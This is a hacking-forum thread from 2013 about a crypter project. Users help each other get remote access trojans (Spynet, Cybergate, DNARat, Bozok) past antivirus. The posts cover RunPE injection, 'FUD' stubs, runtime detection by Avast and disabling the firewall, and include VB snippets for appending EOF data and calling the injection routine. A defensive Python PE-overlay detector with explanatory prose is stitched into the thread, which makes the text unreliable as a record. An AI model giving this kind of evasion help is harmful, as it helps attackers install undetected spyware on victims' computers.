The Matrix Project

Source

  • This topic is locked
43 replies to this topic

#21 mystario

mystario

    Beginner

  • Members
  • Reputation: 0
    Neutral
  • 18 posts

Posted 11 March 2013 - 03:34 PM

Is this working with Win7?



#22 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Location: msfconsole
Contributor

Posted 11 March 2013 - 04:24 PM

No, it only works with Win 3.11 and Win 95 ...


  • ali_m, SuckerZ and to.Index like this

#23 Trojan

Trojan

    Beginner

  • Members
  • Reputation: 6
    Neutral
  • 16 posts
  • Location: 127.0.0.1

Posted 03 May 2013 - 04:36 PM

This looks like an awesome project, best of luck to everyone involved!

-Trojan


If you need anything feel free to add me on my jabber.


#24 noh4t

noh4t

    Intermediate Member

  • Verified Seller
  • Reputation: 136
    Very Good
  • 260 posts
  • Location: Basic Input/Output System
Contributor

Posted 07 September 2013 - 06:49 PM

Nice project, I'm working with it currently. I was just wondering, is there a way to get this working on 64-bit without changing the RunPE?

Obfuscator - x64/x86 [0/35]
-Dynamic Output-

- FUD-

Pm For Jabber.
 


#25 SuckerZ

SuckerZ

    Intermediate Member

  • Associate
  • Reputation: 67
    Good
  • 160 posts

Posted 07 September 2013 - 07:19 PM

> No, it only works with Win 3.11 and Win 95 ...

Yeah, you made my day ;) Nice project.



#26 noh4t

Posted 08 September 2013 - 12:25 AM

Damn.. worked on this all day and it does not work with any of my programs :( Such a shame.. easy fix or should I give up?

Not working with Spynet/Cybergate/DNARat .... such a shame, such a nice crypter too..



#27 poison2012

poison2012

    Member

  • Members
  • Reputation: 34
    Fair
  • 52 posts

Posted 08 September 2013 - 03:24 PM

Something is going on here :)

Good work & luck!



#28 noh4t

Posted 08 September 2013 - 03:52 PM

Replaced GetfilePath with another method and also tried to change the RunPE to a similar shellcode one..

Still fails with Spynet and DNARat. Once the RAT has dropped, I can see it in Task Manager; it does successfully drop into its install directory, then it goes to inject into the default browser and comes up with an error about Firefox runtimes..



#29 DualCoder

DualCoder

    Member

  • Associate
  • Reputation: 39
    Fair
  • 34 posts
  • Location: Sweden

Posted 08 September 2013 - 04:38 PM

> Damn.. worked on this all day and it does not work with any of my programs :( Such a shame.. easy fix or should I give up?
>
> Not working with Spynet/Cybergate/DNARat .... such a shame, such a nice crypter too..

Which stub are you using? If it's the one I wrote (C++) maybe I can help...

//DualCoder


  • noh4t likes this

#30 noh4t

Posted 08 September 2013 - 04:40 PM

> Which stub are you using? If it's the one I wrote (C++) maybe I can help...
>
> //DualCoder

I wish I knew C++, but I am using the VB version posted. Thanks though, Dual.



#31 Neelix

Posted 08 September 2013 - 07:13 PM

You might add EOF support in the builder to make it work.



#32 noh4t

Posted 08 September 2013 - 07:26 PM

> You might add EOF support in the builder to make it work.

It already has EOF support, I just checked.


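' Appends sEOFData after the current end of the file at sFilePath.
Public Sub WriteEOFData(sFilePath As String, sEOFData As String)
    On Error Resume Next
    Dim sFile As String
    Dim lFF As Long

    lFF = FreeFile

    ' Read the whole existing file into sFile
    Open sFilePath For Binary As #lFF
    sFile = Space(LOF(lFF))
    Get #lFF, , sFile
    Close #lFF

    ' Delete the file and write it back with sEOFData appended
    Kill sFilePath
    lFF = FreeFile

    Open sFilePath For Binary As #lFF
    Put #lFF, , sFile & sEOFData
    Close #lFF
End Sub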


Also, I FUDed the stub, but Avast picks it up at runtime, not scantime :(


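Post #32 pastes a routine that appends data after the end of an executable; for a defender that appended region is the PE overlay, a common static triage signal. The added example below (not code from this thread or the project; the function names and the sample image are constructed for illustration) locates the overlay, skips a certificate table that sits directly after the last section, and measures entropy.

```python
import math
import struct
from collections import Counter

def pe_overlay(data: bytes):
    """Return (offset, size) of bytes stored after everything the PE headers describe."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    num_sections, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24                      # optional header follows the 20-byte COFF header
    table = opt + opt_size                   # section table, 40 bytes per entry
    end = table + 40 * num_sections
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    # An Authenticode certificate table (data directory 4) legitimately sits
    # right after the last section; skip it so signed files are not flagged.
    magic, = struct.unpack_from("<H", data, opt)
    dirs = opt + (112 if magic == 0x20B else 96)
    if opt_size >= dirs - opt + 40 and struct.unpack_from("<I", data, dirs - 4)[0] > 4:
        cert_off, cert_size = struct.unpack_from("<II", data, dirs + 32)
        if cert_off == end:
            end += cert_size
    end = min(end, len(data))                # truncated file: no overlay
    return end, len(data) - end

def entropy(buf: bytes) -> float:
    """Shannon entropy in bits per byte; packed or encrypted data approaches 8.0."""
    return 0.0 - sum(c / len(buf) * math.log2(c / len(buf)) for c in Counter(buf).values())

def build_sample(overlay: bytes = b"") -> bytes:
    """Constructed minimal PE32 layout (headers plus one 512-byte section), not a real program."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)             # no data directories
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200,
                       0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + coff + opt + sect
    return headers.ljust(0x200, b"\0") + b"\x90" * 0x200 + overlay

if __name__ == "__main__":
    blob = bytes(range(256)) * 4             # constructed stand-in for appended data
    off, size = pe_overlay(build_sample(blob))
    print(f"overlay at 0x{off:X}, {size} bytes, entropy {entropy(blob):.2f}")
```

An overlay alone is not a verdict, since installers and self-extracting archives carry one too; a large, high-entropy overlay is a reason to look closer.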

#33 Neelix

Posted 08 September 2013 - 08:05 PM

I meant check it, not add, sorry. If it doesn't work, try to inject in its own process (app.path)

or try to use it without callapi. I couldn't take a look at that scrs atm, but it was working on Win7 64-bit. Try Bozok RAT; if it fails to connect, there is something wrong with your OS or modifications on stub.


  • noh4t likes this

#34 noh4t

Posted 08 September 2013 - 08:40 PM

> I meant check it, not add, sorry. If it doesn't work, try to inject in its own process (app.path)
> or try to use it without callapi. I couldn't take a look at that scrs atm, but it was working on Win7 64-bit. Try Bozok RAT; if it fails to connect, there is something wrong with your OS or modifications on stub.

Okay, I will try, Neelix. Also, Bozok will work fine because the normal version has no injection; it seems it's only programs that inject that have issues.

Will keep you updated. If anybody else wants to help, it would be appreciated.



#35 noh4t

Posted 10 September 2013 - 07:10 PM

'app.path

If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\App.Path & " \ " & App.EXEName & .exe", RootByte)

---------------------------
Projekt1
---------------------------
Run-time error '13':

Type mismatch
---------------------------
OK
---------------------------

what is wrong with my command~?



#36 SuckerZ

Posted 11 September 2013 - 12:06 AM

try this: If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\" & App.Path & " \ " & App.EXEName & .exe", RootByte())



#37 SuckerZ

Posted 11 September 2013 - 12:42 AM

this is better:

 

If (Mid$(RootOptions, 3, 1) = 1) Then Call RootPE(App.Path & " \ " & App.EXEName & " .exe", RootByte())

 

should be working :)


  • Neelix likes this

#38 Neelix

Posted 11 September 2013 - 03:23 AM

> 'app.path
>
> If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\App.Path & " \ " & App.EXEName & .exe", RootByte)
>
> ---------------------------
> Projekt1
> ---------------------------
> Run-time error '13':
>
> Type mismatch
> ---------------------------
> OK
> ---------------------------
>
> what is wrong with my command~?

:blink:

Might first understand the basics of vb before messing around with crypters.

> this is better:
>
> If (Mid$(RootOptions, 3, 1) = 1) Then Call RootPE(App.Path & " \ " & App.EXEName & " .exe", RootByte())
>
> should be working :)

:)



#39 noh4t

Posted 12 September 2013 - 02:11 AM

I made it into a function; it's less detected working this way.

Thanks



#40 dafuq

dafuq

    Beginner

  • Members
  • Reputation: 2
    Neutral
  • 12 posts

Posted 06 December 2013 - 01:16 PM

 

 

Good idea/project.

Might wanna leave the disable firewall out; this could lead to a higher detection rate.

Since most of the bots/malware are connecting to a server and already have a firewall bypass in them, you could leave that option.

Also, an idea is to inject into a specific custom process.

I will take a look at the C++ part.

